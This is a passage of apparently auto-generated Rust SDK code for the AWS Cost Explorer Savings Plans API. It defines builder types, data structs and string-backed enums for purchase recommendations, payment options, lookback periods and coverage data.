        pub fn estimated_on_demand_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_on_demand_cost = Some(input.into());
            self
        }
        /// <p>The remaining On-Demand cost estimated to not be covered by the recommended Savings
        /// Plans, over the length of the lookback period.</p>
        pub fn set_estimated_on_demand_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_on_demand_cost = input;
            self
        }
        /// <p> The estimated On-Demand costs you would expect with no additional commitment, based
        /// on your usage of the selected time period and the Savings Plans you own. </p>
        pub fn estimated_on_demand_cost_with_current_commitment(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_on_demand_cost_with_current_commitment = Some(input.into());
            self
        }
        /// <p> The estimated On-Demand costs you would expect with no additional commitment, based
        /// on your usage of the selected time period and the Savings Plans you own. </p>
        pub fn set_estimated_on_demand_cost_with_current_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_on_demand_cost_with_current_commitment = input;
            self
        }
        /// <p>The estimated savings amount that's based on the recommended Savings Plans over the
        /// length of the lookback period.</p>
        pub fn estimated_savings_amount(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_savings_amount = Some(input.into());
            self
        }
        /// <p>The estimated savings amount that's based on the recommended Savings Plans over the
        /// length of the lookback period.</p>
        pub fn set_estimated_savings_amount(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_savings_amount = input;
            self
        }
        /// <p>The estimated savings percentage relative to the total cost of applicable On-Demand
        /// usage over the lookback period.</p>
        pub fn estimated_savings_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_savings_percentage = Some(input.into());
            self
        }
        /// <p>The estimated savings percentage relative to the total cost of applicable On-Demand
        /// usage over the lookback period.</p>
        pub fn set_estimated_savings_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_savings_percentage = input;
            self
        }
        /// <p>The recommended hourly commitment level for the Savings Plans type and the
        /// configuration that's based on the usage during the lookback period.</p>
        pub fn hourly_commitment_to_purchase(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.hourly_commitment_to_purchase = Some(input.into());
            self
        }
        /// <p>The recommended hourly commitment level for the Savings Plans type and the
        /// configuration that's based on the usage during the lookback period.</p>
        pub fn set_hourly_commitment_to_purchase(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.hourly_commitment_to_purchase = input;
            self
        }
        /// <p>The estimated utilization of the recommended Savings Plans.</p>
        pub fn estimated_average_utilization(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_average_utilization = Some(input.into());
            self
        }
        /// <p>The estimated utilization of the recommended Savings Plans.</p>
        pub fn set_estimated_average_utilization(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_average_utilization = input;
            self
        }
        /// <p>The estimated monthly savings amount based on the recommended Savings Plans.</p>
        pub fn estimated_monthly_savings_amount(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_amount = Some(input.into());
            self
        }
        /// <p>The estimated monthly savings amount based on the recommended Savings Plans.</p>
        pub fn set_estimated_monthly_savings_amount(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_amount = input;
            self
        }
        /// <p>The lowest value of hourly On-Demand spend over the lookback period of the applicable
        /// usage type.</p>
        pub fn current_minimum_hourly_on_demand_spend(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.current_minimum_hourly_on_demand_spend = Some(input.into());
            self
        }
        /// <p>The lowest value of hourly On-Demand spend over the lookback period of the applicable
        /// usage type.</p>
        pub fn set_current_minimum_hourly_on_demand_spend(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.current_minimum_hourly_on_demand_spend = input;
            self
        }
        /// <p>The highest value of hourly On-Demand spend over the lookback period of the applicable
        /// usage type.</p>
        pub fn current_maximum_hourly_on_demand_spend(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.current_maximum_hourly_on_demand_spend = Some(input.into());
            self
        }
        /// <p>The highest value of hourly On-Demand spend over the lookback period of the applicable
        /// usage type.</p>
        pub fn set_current_maximum_hourly_on_demand_spend(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.current_maximum_hourly_on_demand_spend = input;
            self
        }
        /// <p>The average value of hourly On-Demand spend over the lookback period of the applicable
        /// usage type.</p>
        pub fn current_average_hourly_on_demand_spend(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.current_average_hourly_on_demand_spend = Some(input.into());
            self
        }
        /// <p>The average value of hourly On-Demand spend over the lookback period of the applicable
        /// usage type.</p>
        pub fn set_current_average_hourly_on_demand_spend(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.current_average_hourly_on_demand_spend = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
        pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendationDetail {
            crate::model::SavingsPlansPurchaseRecommendationDetail {
                savings_plans_details: self.savings_plans_details,
                account_id: self.account_id,
                upfront_cost: self.upfront_cost,
                estimated_roi: self.estimated_roi,
                currency_code: self.currency_code,
                estimated_sp_cost: self.estimated_sp_cost,
                estimated_on_demand_cost: self.estimated_on_demand_cost,
                estimated_on_demand_cost_with_current_commitment: self
                    .estimated_on_demand_cost_with_current_commitment,
                estimated_savings_amount: self.estimated_savings_amount,
                estimated_savings_percentage: self.estimated_savings_percentage,
                hourly_commitment_to_purchase: self.hourly_commitment_to_purchase,
                estimated_average_utilization: self.estimated_average_utilization,
                estimated_monthly_savings_amount: self.estimated_monthly_savings_amount,
                current_minimum_hourly_on_demand_spend: self.current_minimum_hourly_on_demand_spend,
                current_maximum_hourly_on_demand_spend: self.current_maximum_hourly_on_demand_spend,
                current_average_hourly_on_demand_spend: self.current_average_hourly_on_demand_spend,
            }
        }
    }
}
impl SavingsPlansPurchaseRecommendationDetail {
    /// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
    pub fn builder() -> crate::model::savings_plans_purchase_recommendation_detail::Builder {
        // The return type pins the concrete builder; rely on type inference.
        std::default::Default::default()
    }
}
/// <p>The attribute details on a specific Savings Plan.</p>
///
/// All three attributes are optional strings; no validation is performed here.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansDetails {
    /// <p>A collection of Amazon Web Services resources in a geographic area. Each Amazon Web Services Region is isolated and independent of the other Regions.</p>
    pub region: std::option::Option<std::string::String>,
    /// <p>A group of instance types that Savings Plans applies to.</p>
    pub instance_family: std::option::Option<std::string::String>,
    /// <p>The unique ID that's used to distinguish Savings Plans from one another.</p>
    pub offering_id: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansDetails {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Render every field, in declaration order, via one builder chain.
        f.debug_struct("SavingsPlansDetails")
            .field("region", &self.region)
            .field("instance_family", &self.instance_family)
            .field("offering_id", &self.offering_id)
            .finish()
    }
}
/// See [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
pub mod savings_plans_details {
    /// A builder for [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) instance_family: std::option::Option<std::string::String>,
        pub(crate) offering_id: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>A collection of Amazon Web Services resources in a geographic area. Each Amazon Web Services Region is isolated and independent of the other Regions.</p>
        pub fn region(self, input: impl Into<std::string::String>) -> Self {
            Self {
                region: Some(input.into()),
                ..self
            }
        }
        /// <p>A collection of Amazon Web Services resources in a geographic area. Each Amazon Web Services Region is isolated and independent of the other Regions.</p>
        pub fn set_region(self, input: std::option::Option<std::string::String>) -> Self {
            Self {
                region: input,
                ..self
            }
        }
        /// <p>A group of instance types that Savings Plans applies to.</p>
        pub fn instance_family(self, input: impl Into<std::string::String>) -> Self {
            Self {
                instance_family: Some(input.into()),
                ..self
            }
        }
        /// <p>A group of instance types that Savings Plans applies to.</p>
        pub fn set_instance_family(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                instance_family: input,
                ..self
            }
        }
        /// <p>The unique ID that's used to distinguish Savings Plans from one another.</p>
        pub fn offering_id(self, input: impl Into<std::string::String>) -> Self {
            Self {
                offering_id: Some(input.into()),
                ..self
            }
        }
        /// <p>The unique ID that's used to distinguish Savings Plans from one another.</p>
        pub fn set_offering_id(self, input: std::option::Option<std::string::String>) -> Self {
            Self {
                offering_id: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
        pub fn build(self) -> crate::model::SavingsPlansDetails {
            // Move each accumulated field straight into the model struct.
            let Builder {
                region,
                instance_family,
                offering_id,
            } = self;
            crate::model::SavingsPlansDetails {
                region,
                instance_family,
                offering_id,
            }
        }
    }
}
impl SavingsPlansDetails {
    /// Creates a new builder-style object to manufacture [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
    pub fn builder() -> crate::model::savings_plans_details::Builder {
        // The return type pins the concrete builder; rely on type inference.
        std::default::Default::default()
    }
}
/// The lookback window used when generating recommendations.
///
/// Variant order is load-bearing: the derived `Ord`/`PartialOrd` follow
/// declaration order, so it must match the original definition.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum LookbackPeriodInDays {
    SevenDays,
    SixtyDays,
    ThirtyDays,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for LookbackPeriodInDays {
    /// Maps a wire-format string onto a variant; anything unrecognized
    /// is preserved verbatim inside `Unknown`.
    fn from(value: &str) -> Self {
        match value {
            "SEVEN_DAYS" => Self::SevenDays,
            "SIXTY_DAYS" => Self::SixtyDays,
            "THIRTY_DAYS" => Self::ThirtyDays,
            unrecognized => Self::Unknown(unrecognized.to_owned()),
        }
    }
}
impl std::str::FromStr for LookbackPeriodInDays {
    type Err = std::convert::Infallible;
    /// Parsing never fails; it delegates to the `From<&str>` conversion.
    fn from_str(text: &str) -> std::result::Result<Self, Self::Err> {
        Ok(text.into())
    }
}
impl LookbackPeriodInDays {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::SevenDays => "SEVEN_DAYS",
            Self::SixtyDays => "SIXTY_DAYS",
            Self::ThirtyDays => "THIRTY_DAYS",
            Self::Unknown(raw) => raw.as_ref(),
        }
    }
    /// Returns the wire-format values that were known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["SEVEN_DAYS", "SIXTY_DAYS", "THIRTY_DAYS"]
    }
}
impl AsRef<str> for LookbackPeriodInDays {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// The payment option chosen for a purchase recommendation.
///
/// Variant order is load-bearing: the derived `Ord`/`PartialOrd` follow
/// declaration order, so it must match the original definition.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum PaymentOption {
    AllUpfront,
    HeavyUtilization,
    LightUtilization,
    MediumUtilization,
    NoUpfront,
    PartialUpfront,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for PaymentOption {
    /// Maps a wire-format string onto a variant; anything unrecognized
    /// is preserved verbatim inside `Unknown`.
    fn from(value: &str) -> Self {
        match value {
            "ALL_UPFRONT" => Self::AllUpfront,
            "HEAVY_UTILIZATION" => Self::HeavyUtilization,
            "LIGHT_UTILIZATION" => Self::LightUtilization,
            "MEDIUM_UTILIZATION" => Self::MediumUtilization,
            "NO_UPFRONT" => Self::NoUpfront,
            "PARTIAL_UPFRONT" => Self::PartialUpfront,
            unrecognized => Self::Unknown(unrecognized.to_owned()),
        }
    }
}
impl std::str::FromStr for PaymentOption {
    type Err = std::convert::Infallible;
    /// Parsing never fails; it delegates to the `From<&str>` conversion.
    fn from_str(text: &str) -> std::result::Result<Self, Self::Err> {
        Ok(text.into())
    }
}
impl PaymentOption {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::AllUpfront => "ALL_UPFRONT",
            Self::HeavyUtilization => "HEAVY_UTILIZATION",
            Self::LightUtilization => "LIGHT_UTILIZATION",
            Self::MediumUtilization => "MEDIUM_UTILIZATION",
            Self::NoUpfront => "NO_UPFRONT",
            Self::PartialUpfront => "PARTIAL_UPFRONT",
            Self::Unknown(raw) => raw.as_ref(),
        }
    }
    /// Returns the wire-format values that were known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &[
            "ALL_UPFRONT",
            "HEAVY_UTILIZATION",
            "LIGHT_UTILIZATION",
            "MEDIUM_UTILIZATION",
            "NO_UPFRONT",
            "PARTIAL_UPFRONT",
        ]
    }
}
impl AsRef<str> for PaymentOption {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// The Savings Plans commitment term length.
///
/// Variant order is load-bearing: the derived `Ord`/`PartialOrd` follow
/// declaration order, so it must match the original definition.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum TermInYears {
    OneYear,
    ThreeYears,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for TermInYears {
    /// Maps a wire-format string onto a variant; anything unrecognized
    /// is preserved verbatim inside `Unknown`.
    fn from(value: &str) -> Self {
        match value {
            "ONE_YEAR" => Self::OneYear,
            "THREE_YEARS" => Self::ThreeYears,
            unrecognized => Self::Unknown(unrecognized.to_owned()),
        }
    }
}
impl std::str::FromStr for TermInYears {
    type Err = std::convert::Infallible;
    /// Parsing never fails; it delegates to the `From<&str>` conversion.
    fn from_str(text: &str) -> std::result::Result<Self, Self::Err> {
        Ok(text.into())
    }
}
impl TermInYears {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::OneYear => "ONE_YEAR",
            Self::ThreeYears => "THREE_YEARS",
            Self::Unknown(raw) => raw.as_ref(),
        }
    }
    /// Returns the wire-format values that were known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["ONE_YEAR", "THREE_YEARS"]
    }
}
impl AsRef<str> for TermInYears {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// A Savings Plans type, exchanged with the service in its
/// SCREAMING_SNAKE_CASE wire form (see [`SupportedSavingsPlansType::as_str`]).
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum SupportedSavingsPlansType {
    ComputeSp,
    Ec2InstanceSp,
    SagemakerSp,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for SupportedSavingsPlansType {
    // Unrecognized wire strings are preserved verbatim inside `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "COMPUTE_SP" => Self::ComputeSp,
            "EC2_INSTANCE_SP" => Self::Ec2InstanceSp,
            "SAGEMAKER_SP" => Self::SagemakerSp,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for SupportedSavingsPlansType {
    type Err = std::convert::Infallible;
    // Parsing never fails: any string maps to `Unknown` at worst.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl SupportedSavingsPlansType {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::ComputeSp => "COMPUTE_SP",
            Self::Ec2InstanceSp => "EC2_INSTANCE_SP",
            Self::SagemakerSp => "SAGEMAKER_SP",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns every wire value known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &["COMPUTE_SP", "EC2_INSTANCE_SP", "SAGEMAKER_SP"]
    }
}
impl AsRef<str> for SupportedSavingsPlansType {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// An account scope, exchanged with the service in its
/// SCREAMING_SNAKE_CASE wire form (see [`AccountScope::as_str`]).
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum AccountScope {
    Linked,
    Payer,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for AccountScope {
    // Unrecognized wire strings are preserved verbatim inside `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "LINKED" => Self::Linked,
            "PAYER" => Self::Payer,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for AccountScope {
    type Err = std::convert::Infallible;
    // Parsing never fails: any string maps to `Unknown` at worst.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl AccountScope {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Linked => "LINKED",
            Self::Payer => "PAYER",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns every wire value known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &["LINKED", "PAYER"]
    }
}
impl AsRef<str> for AccountScope {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>Metadata about your Savings Plans Purchase Recommendations.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendationMetadata {
    /// <p>The unique identifier for the recommendation set.</p>
    pub recommendation_id: std::option::Option<std::string::String>,
    /// <p>The timestamp showing when the recommendations were generated.</p>
    pub generation_timestamp: std::option::Option<std::string::String>,
    /// <p>Additional metadata that might be applicable to the recommendation.</p>
    pub additional_metadata: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendationMetadata {
    // Hand-written Debug listing every field; keep in sync with the struct above.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        let mut formatter = f.debug_struct("SavingsPlansPurchaseRecommendationMetadata");
        formatter.field("recommendation_id", &self.recommendation_id);
        formatter.field("generation_timestamp", &self.generation_timestamp);
        formatter.field("additional_metadata", &self.additional_metadata);
        formatter.finish()
    }
}
/// See [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
pub mod savings_plans_purchase_recommendation_metadata {
    /// A builder for [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) recommendation_id: std::option::Option<std::string::String>,
        pub(crate) generation_timestamp: std::option::Option<std::string::String>,
        pub(crate) additional_metadata: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The unique identifier for the recommendation set.</p>
        pub fn recommendation_id(mut self, input: impl Into<std::string::String>) -> Self {
            self.recommendation_id = Some(input.into());
            self
        }
        /// <p>The unique identifier for the recommendation set.</p>
        pub fn set_recommendation_id(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.recommendation_id = input;
            self
        }
        /// <p>The timestamp showing when the recommendations were generated.</p>
        pub fn generation_timestamp(mut self, input: impl Into<std::string::String>) -> Self {
            self.generation_timestamp = Some(input.into());
            self
        }
        /// <p>The timestamp showing when the recommendations were generated.</p>
        pub fn set_generation_timestamp(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.generation_timestamp = input;
            self
        }
        /// <p>Additional metadata that might be applicable to the recommendation.</p>
        pub fn additional_metadata(mut self, input: impl Into<std::string::String>) -> Self {
            self.additional_metadata = Some(input.into());
            self
        }
        /// <p>Additional metadata that might be applicable to the recommendation.</p>
        pub fn set_additional_metadata(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.additional_metadata = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
        pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendationMetadata {
            crate::model::SavingsPlansPurchaseRecommendationMetadata {
                recommendation_id: self.recommendation_id,
                generation_timestamp: self.generation_timestamp,
                additional_metadata: self.additional_metadata,
            }
        }
    }
}
impl SavingsPlansPurchaseRecommendationMetadata {
    /// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
    pub fn builder() -> crate::model::savings_plans_purchase_recommendation_metadata::Builder {
        crate::model::savings_plans_purchase_recommendation_metadata::Builder::default()
    }
}
/// <p>The amount of Savings Plans eligible usage that is covered by Savings Plans. All
/// calculations consider the On-Demand equivalent of your Savings Plans usage.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansCoverage {
    /// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
    pub attributes:
        std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
    /// <p>The amount of Savings Plans eligible usage that the Savings Plans covered.</p>
    pub coverage: std::option::Option<crate::model::SavingsPlansCoverageData>,
    /// <p>The time period of the request. </p>
    pub time_period: std::option::Option<crate::model::DateInterval>,
}
impl std::fmt::Debug for SavingsPlansCoverage {
    // Hand-written Debug listing every field; keep in sync with the struct above.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        let mut formatter = f.debug_struct("SavingsPlansCoverage");
        formatter.field("attributes", &self.attributes);
        formatter.field("coverage", &self.coverage);
        formatter.field("time_period", &self.time_period);
        formatter.finish()
    }
}
/// See [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
pub mod savings_plans_coverage {
    /// A builder for [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) attributes: std::option::Option<
            std::collections::HashMap<std::string::String, std::string::String>,
        >,
        pub(crate) coverage: std::option::Option<crate::model::SavingsPlansCoverageData>,
        pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
    }
    impl Builder {
        /// Adds a single key/value pair to `attributes`, creating the map on
        /// first use; call `set_attributes` to replace the whole map at once.
        pub fn attributes(
            mut self,
            k: impl Into<std::string::String>,
            v: impl Into<std::string::String>,
        ) -> Self {
            let mut hash_map = self.attributes.unwrap_or_default();
            hash_map.insert(k.into(), v.into());
            self.attributes = Some(hash_map);
            self
        }
        /// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
        pub fn set_attributes(
            mut self,
            input: std::option::Option<
                std::collections::HashMap<std::string::String, std::string::String>,
            >,
        ) -> Self {
            self.attributes = input;
            self
        }
        /// <p>The amount of Savings Plans eligible usage that the Savings Plans covered.</p>
        pub fn coverage(mut self, input: crate::model::SavingsPlansCoverageData) -> Self {
            self.coverage = Some(input);
            self
        }
        /// <p>The amount of Savings Plans eligible usage that the Savings Plans covered.</p>
        pub fn set_coverage(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansCoverageData>,
        ) -> Self {
            self.coverage = input;
            self
        }
        /// <p>The time period of the request. </p>
        pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
            self.time_period = Some(input);
            self
        }
        /// <p>The time period of the request. </p>
        pub fn set_time_period(
            mut self,
            input: std::option::Option<crate::model::DateInterval>,
        ) -> Self {
            self.time_period = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
        pub fn build(self) -> crate::model::SavingsPlansCoverage {
            crate::model::SavingsPlansCoverage {
                attributes: self.attributes,
                coverage: self.coverage,
                time_period: self.time_period,
            }
        }
    }
}
impl SavingsPlansCoverage {
    /// Creates a new builder-style object to manufacture [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
    pub fn builder() -> crate::model::savings_plans_coverage::Builder {
        crate::model::savings_plans_coverage::Builder::default()
    }
}
/// <p>Specific coverage percentage, On-Demand costs, and spend covered by Savings Plans, and
/// total Savings Plans costs for an account.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansCoverageData {
    /// <p>The amount of your Amazon Web Services usage that is covered by a Savings Plans.</p>
    pub spend_covered_by_savings_plans: std::option::Option<std::string::String>,
    /// <p>The cost of your Amazon Web Services usage at the public On-Demand rate.</p>
    pub on_demand_cost: std::option::Option<std::string::String>,
    /// <p>The total cost of your Amazon Web Services usage, regardless of your purchase
    /// option.</p>
    pub total_cost: std::option::Option<std::string::String>,
    /// <p>The percentage of your existing Savings Plans covered usage, divided by all of your
    /// eligible Savings Plans usage in an account (or set of accounts).</p>
    pub coverage_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansCoverageData {
    // Hand-written Debug listing every field; keep in sync with the struct above.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        let mut formatter = f.debug_struct("SavingsPlansCoverageData");
        formatter.field(
            "spend_covered_by_savings_plans",
            &self.spend_covered_by_savings_plans,
        );
        formatter.field("on_demand_cost", &self.on_demand_cost);
        formatter.field("total_cost", &self.total_cost);
        formatter.field("coverage_percentage", &self.coverage_percentage);
        formatter.finish()
    }
}
/// See [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
pub mod savings_plans_coverage_data {
    /// A builder for [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) spend_covered_by_savings_plans: std::option::Option<std::string::String>,
        pub(crate) on_demand_cost: std::option::Option<std::string::String>,
        pub(crate) total_cost: std::option::Option<std::string::String>,
        pub(crate) coverage_percentage: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The amount of your Amazon Web Services usage that is covered by a Savings Plans.</p>
        pub fn spend_covered_by_savings_plans(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.spend_covered_by_savings_plans = Some(input.into());
            self
        }
        /// <p>The amount of your Amazon Web Services usage that is covered by a Savings Plans.</p>
        pub fn set_spend_covered_by_savings_plans(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.spend_covered_by_savings_plans = input;
            self
        }
        /// <p>The cost of your Amazon Web Services usage at the public On-Demand rate.</p>
        pub fn on_demand_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.on_demand_cost = Some(input.into());
            self
        }
        /// <p>The cost of your Amazon Web Services usage at the public On-Demand rate.</p>
        pub fn set_on_demand_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.on_demand_cost = input;
            self
        }
        /// <p>The total cost of your Amazon Web Services usage, regardless of your purchase
        /// option.</p>
        pub fn total_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_cost = Some(input.into());
            self
        }
        /// <p>The total cost of your Amazon Web Services usage, regardless of your purchase
        /// option.</p>
        pub fn set_total_cost(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.total_cost = input;
            self
        }
        /// <p>The percentage of your existing Savings Plans covered usage, divided by all of your
        /// eligible Savings Plans usage in an account (or set of accounts).</p>
        pub fn coverage_percentage(mut self, input: impl Into<std::string::String>) -> Self {
            self.coverage_percentage = Some(input.into());
            self
        }
        /// <p>The percentage of your existing Savings Plans covered usage, divided by all of your
        /// eligible Savings Plans usage in an account (or set of accounts).</p>
        pub fn set_coverage_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.coverage_percentage = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
        pub fn build(self) -> crate::model::SavingsPlansCoverageData {
            crate::model::SavingsPlansCoverageData {
                spend_covered_by_savings_plans: self.spend_covered_by_savings_plans,
                on_demand_cost: self.on_demand_cost,
                total_cost: self.total_cost,
                coverage_percentage: self.coverage_percentage,
            }
        }
    }
}
impl SavingsPlansCoverageData {
    /// Creates a new builder-style object to manufacture [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
    pub fn builder() -> crate::model::savings_plans_coverage_data::Builder {
        crate::model::savings_plans_coverage_data::Builder::default()
    }
}
/// <p>Represents a group when you specify a group by criteria or in the response to a query
/// with a specific grouping.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GroupDefinition {
    /// <p>The string that represents the type of group.</p>
    pub r#type: std::option::Option<crate::model::GroupDefinitionType>,
    /// <p>The string that represents a key for a specified group.</p>
    pub key: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GroupDefinition {
    // Hand-written Debug listing every field; keep in sync with the struct above.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
